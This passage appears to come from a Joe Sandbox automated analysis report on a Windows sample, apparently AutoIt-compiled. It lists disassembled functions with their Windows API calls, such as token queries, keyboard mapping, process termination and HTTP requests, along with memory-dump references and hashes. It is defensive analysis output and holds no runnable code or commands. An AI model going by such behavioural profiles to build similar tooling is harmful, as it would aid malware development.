                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                        • String ID: X
                                        • API String ID: 774024439-3081909835
                                        • Opcode ID: 5c40b5c8c76f773c720d0a6f9455c59fa994bded93305b82e2dc3145934a306a
                                        • Instruction ID: 3f7b3c820d604e8e486564f51445104b57d4e985b366d91d66208aaf1accc5fe
                                        • Opcode Fuzzy Hash: 5c40b5c8c76f773c720d0a6f9455c59fa994bded93305b82e2dc3145934a306a
                                        • Instruction Fuzzy Hash: 9DC18F716083449FC724EF24C881A6AB7E4FF85314F14596DF89DAB2A2DB70ED45CB82
                                        Function 00ED8D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00ED85F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00ED8608
                                          • Part of subcall function 00ED85F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00ED8612
                                          • Part of subcall function 00ED85F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00ED8621
                                          • Part of subcall function 00ED85F1: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00ED8628
                                          • Part of subcall function 00ED85F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00ED863E
                                        • GetLengthSid.ADVAPI32(?,00000000,00ED8977), ref: 00ED8DAC
                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00ED8DB8
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00ED8DBF
                                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 00ED8DD8
                                        • GetProcessHeap.KERNEL32(00000000,00000000,00ED8977), ref: 00ED8DEC
                                        • HeapFree.KERNEL32(00000000), ref: 00ED8DF3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Heap$Process$AllocateInformationToken$CopyErrorFreeLastLength
                                        • String ID:
                                        • API String ID: 169236558-0
                                        • Opcode ID: 205748ead31ebe9d9579aa59ba5eec25301e91ed42b7a79930ffd87e0d0e0def
                                        • Instruction ID: ca72b9217ee1cdd1fb8f83c4093a2fd8830bb7e407a5339223b4e9e516a06dab
                                        • Opcode Fuzzy Hash: 205748ead31ebe9d9579aa59ba5eec25301e91ed42b7a79930ffd87e0d0e0def
                                        • Instruction Fuzzy Hash: 3F11DC31500608FFDB209FA4CD08BAE7BBEFF54319F10412AE885A3291CB32A905DB60
                                        Function 00F0C19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00E812F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E8134D
                                          • Part of subcall function 00E812F3: SelectObject.GDI32(?,00000000), ref: 00E8135C
                                          • Part of subcall function 00E812F3: BeginPath.GDI32(?), ref: 00E81373
                                          • Part of subcall function 00E812F3: SelectObject.GDI32(?,00000000), ref: 00E8139C
                                        • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00F0C1C4
                                        • LineTo.GDI32(00000000,00000003,?), ref: 00F0C1D8
                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00F0C1E6
                                        • LineTo.GDI32(00000000,00000000,?), ref: 00F0C1F6
                                        • EndPath.GDI32(00000000), ref: 00F0C206
                                        • StrokePath.GDI32(00000000), ref: 00F0C216
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                        • String ID:
                                        • API String ID: 43455801-0
                                        • Opcode ID: 4842024e85c54e6a6426bc48ce1a7651dff871d47c83c25278532fdef16a1b8c
                                        • Instruction ID: 4c4a2550992616aeb1f60c0e9dc231d8b1664d5a5d73b4a9587ab74385075c7e
                                        • Opcode Fuzzy Hash: 4842024e85c54e6a6426bc48ce1a7651dff871d47c83c25278532fdef16a1b8c
                                        • Instruction Fuzzy Hash: 2811097640014CBFDB119F90DC88FAA7FADFF19364F048021BE189A5A1C7719D59EBA0
                                        Function 00EA03A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00EA03D3
                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00EA03DB
                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00EA03E6
                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00EA03F1
                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00EA03F9
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EA0401
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Virtual
                                        • String ID:
                                        • API String ID: 4278518827-0
                                        • Opcode ID: bd5a627f728c07e4537b8d571914230669780029d7ef802dc93fb0d1a2bf35c2
                                        • Instruction ID: 94c2afdbd8c9965763a72eb67f687946f27249bfc0c1f16a8e2ae9908a5ad908
                                        • Opcode Fuzzy Hash: bd5a627f728c07e4537b8d571914230669780029d7ef802dc93fb0d1a2bf35c2
                                        • Instruction Fuzzy Hash: 89016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BA15C47941C7F5A868CBE5
                                        Function 00EE568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00EE569B
                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00EE56B1
                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00EE56C0
                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00EE56CF
                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00EE56D9
                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00EE56E0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                        • String ID:
                                        • API String ID: 839392675-0
                                        • Opcode ID: f559cc35d9965d6e1e42f62ca53bbef22aae038f583f97f9407b5af05b176697
                                        • Instruction ID: 217a4be08c786e9b55c9fcf2f70d8771d4b6e338990c9fbd656a01b13140547c
                                        • Opcode Fuzzy Hash: f559cc35d9965d6e1e42f62ca53bbef22aae038f583f97f9407b5af05b176697
                                        • Instruction Fuzzy Hash: F8F01D3224115DBBE7315BA29C0DEAB7A7CFBC6B15F000169FA05D14509AA11A0596B5
                                        Function 00EE74D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • InterlockedExchange.KERNEL32(?,?), ref: 00EE74E5
                                        • RtlEnterCriticalSection.NTDLL(?), ref: 00EE74F6
                                        • TerminateThread.KERNEL32(00000000,000001F6,?,00E91044,?,?), ref: 00EE7503
                                        • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00E91044,?,?), ref: 00EE7510
                                          • Part of subcall function 00EE6ED7: CloseHandle.KERNEL32(00000000,?,00EE751D,?,00E91044,?,?), ref: 00EE6EE1
                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00EE7523
                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 00EE752A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                        • String ID:
                                        • API String ID: 3495660284-0
                                        • Opcode ID: b02aefe65aa64325379c1a626878d5065da5c3f3f2a80887142a41fc9805d90c
                                        • Instruction ID: d5517d2f7e880c7739bb27479eb3b115607d3d912f206ceda49089b1f6fbe06c
                                        • Opcode Fuzzy Hash: b02aefe65aa64325379c1a626878d5065da5c3f3f2a80887142a41fc9805d90c
                                        • Instruction Fuzzy Hash: 22F0823A14071AEBDB312B64FC8C9EB7B3AFF45302B001531F642A18B4CB755909DB90
                                        Function 00EF8902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                        Download Yara Rule
                                        APIs
                                        • VariantInit.OLEAUT32(?), ref: 00EF8928
                                        • CharUpperBuffW.USER32(?,?), ref: 00EF8A37
                                        • VariantClear.OLEAUT32(?), ref: 00EF8BAF
                                          • Part of subcall function 00EE7804: VariantInit.OLEAUT32(00000000), ref: 00EE7844
                                          • Part of subcall function 00EE7804: VariantCopy.OLEAUT32(00000000,?), ref: 00EE784D
                                          • Part of subcall function 00EE7804: VariantClear.OLEAUT32(00000000), ref: 00EE7859
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                        • API String ID: 4237274167-1221869570
                                        • Opcode ID: cd83badf75d7d12a7f9aa73e4f7d028e773e2b0b76c8d4ffa7e55c88272464a5
                                        • Instruction ID: c8294cecde5d1c6b220264bf8944e65c001ca9d3a8d7dc03e22de38df69d085e
                                        • Opcode Fuzzy Hash: cd83badf75d7d12a7f9aa73e4f7d028e773e2b0b76c8d4ffa7e55c88272464a5
                                        • Instruction Fuzzy Hash: 92919E75608305DFC714EF24C58496ABBE4EFC8314F04596EF99AAB362DB30E906CB52
                                        Function 00EE2F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00E9FEC6: _wcscpy.LIBCMT ref: 00E9FEE9
                                        • _memset.LIBCMT ref: 00EE3077
                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00EE30A6
                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00EE3159
                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00EE3187
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ItemMenu$Info$Default_memset_wcscpy
                                        • String ID: 0
                                        • API String ID: 4152858687-4108050209
                                        • Opcode ID: 711f46b9b64c50cb19571c514a747857af23b2c08d00a1c963ffc3848b609bcd
                                        • Instruction ID: 08be7c0ed94e9063c25ab368cb63f96f39630a16b112c7e37db4567d5cbfef26
                                        • Opcode Fuzzy Hash: 711f46b9b64c50cb19571c514a747857af23b2c08d00a1c963ffc3848b609bcd
                                        • Instruction Fuzzy Hash: 7251013160A3889ED7249F39C848A6BBBE8EF45368F04292DF895F3191DB70CE449752
                                        Function 00EDDA5D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 00EDDAC5
                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00EDDAFB
                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00EDDB0C
                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00EDDB8E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                        • String ID: DllGetClassObject
                                        • API String ID: 753597075-1075368562
                                        • Opcode ID: 674441d2896f76f38baca5a7756564c72c2c0b8c6e730f1d00b5faa431ea64e1
                                        • Instruction ID: 58f94f37a34734f4fa4aea45e1ef29c63268e861a00d1bf3bb9df81d25debacf
                                        • Opcode Fuzzy Hash: 674441d2896f76f38baca5a7756564c72c2c0b8c6e730f1d00b5faa431ea64e1
                                        • Instruction Fuzzy Hash: 5F41AEB1604208EFDB14CF54CC84A9ABBA9EF48314F1591ABED05AF305D7B1DE45DBA0
                                        Function 00EE2C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _memset.LIBCMT ref: 00EE2CAF
                                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00EE2CCB
                                        • DeleteMenu.USER32(?,00000007,00000000), ref: 00EE2D11
                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00F46890,00000000), ref: 00EE2D5A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Menu$Delete$InfoItem_memset
                                        • String ID: 0
                                        • API String ID: 1173514356-4108050209
                                        • Opcode ID: 385b9620bee1c240a08213c18193988f96c8181690dfd45458d8d5444bbf31f6
                                        • Instruction ID: 0e332d9a0cf7b2917a3397d2f5af398d3ef5dbde3cd8ed4621ff50acbb240770
                                        • Opcode Fuzzy Hash: 385b9620bee1c240a08213c18193988f96c8181690dfd45458d8d5444bbf31f6
                                        • Instruction Fuzzy Hash: 2D41BF302043859FD724DF25DC44B5ABBE8BF85324F14461DFA65A7291D770E904CB92
                                        Function 00EFDAB9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                        Download Yara Rule
                                        APIs
                                        • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00EFDAD9
                                          • Part of subcall function 00E879AB: _memmove.LIBCMT ref: 00E879F9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: BuffCharLower_memmove
                                        • String ID: cdecl$none$stdcall$winapi
                                        • API String ID: 3425801089-567219261
                                        • Opcode ID: dc54d557f07fec2a161132db5aa4488a24c0f6d5a967f3964ae1222a794b1173
                                        • Instruction ID: 55cda04dbcbe8e06526932b65b35a76ffbcd153038cfa0ebc329876e8158edbf
                                        • Opcode Fuzzy Hash: dc54d557f07fec2a161132db5aa4488a24c0f6d5a967f3964ae1222a794b1173
                                        • Instruction Fuzzy Hash: 7831C3715082199BCF00EF54CC809FEB7F5FF05324B10962AE969B7691CB71E906CB80
                                        Function 00ED9372 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                                          • Part of subcall function 00EDB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00EDB0E7
                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00ED93F6
                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00ED9409
                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 00ED9439
                                          • Part of subcall function 00E87D2C: _memmove.LIBCMT ref: 00E87D66
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: MessageSend$_memmove$ClassName
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 365058703-1403004172
                                        • Opcode ID: 9e40ed183487df685cc6f538371efbdb074d91a85174ce84cb623162f99c030b
                                        • Instruction ID: 3dfbeb1a900a1280f0e93640088c16a2ef908f2c6cbf283b4a881b5d8ad8087a
                                        • Opcode Fuzzy Hash: 9e40ed183487df685cc6f538371efbdb074d91a85174ce84cb623162f99c030b
                                        • Instruction Fuzzy Hash: 0C21E471A00108AEDB14AB70CC858FFB7B8EF05760B14521AF929B72E2DB75594B9610
                                        Function 00EF1B21 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00EF1B40
                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EF1B66
                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00EF1B96
                                        • InternetCloseHandle.WININET(00000000), ref: 00EF1BDD
                                          • Part of subcall function 00EF2777: GetLastError.KERNEL32(?,?,00EF1B0B,00000000,00000000,00000001), ref: 00EF278C
                                          • Part of subcall function 00EF2777: SetEvent.KERNEL32(?,?,00EF1B0B,00000000,00000000,00000001), ref: 00EF27A1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                        • String ID:
                                        • API String ID: 3113390036-3916222277
                                        • Opcode ID: 52dd56c800d79aa0a36b3c32079cc739f445d2e02a8e5d57f7db53777c075396
                                        • Instruction ID: 3afdc684cb3bd1aa419d7e6c08df2fd7b930c98a73fe56b44697d757e87580db
                                        • Opcode Fuzzy Hash: 52dd56c800d79aa0a36b3c32079cc739f445d2e02a8e5d57f7db53777c075396
                                        • Instruction Fuzzy Hash: 4E219FB150420CFFEB219F619C85EBF77ECEB49748F10516AF605B6640EB209D099762
                                        Function 00F06656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00E81D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E81D73
                                          • Part of subcall function 00E81D35: GetStockObject.GDI32(00000011), ref: 00E81D87
                                          • Part of subcall function 00E81D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E81D91
                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00F066D0
                                        • LoadLibraryW.KERNEL32(?), ref: 00F066D7
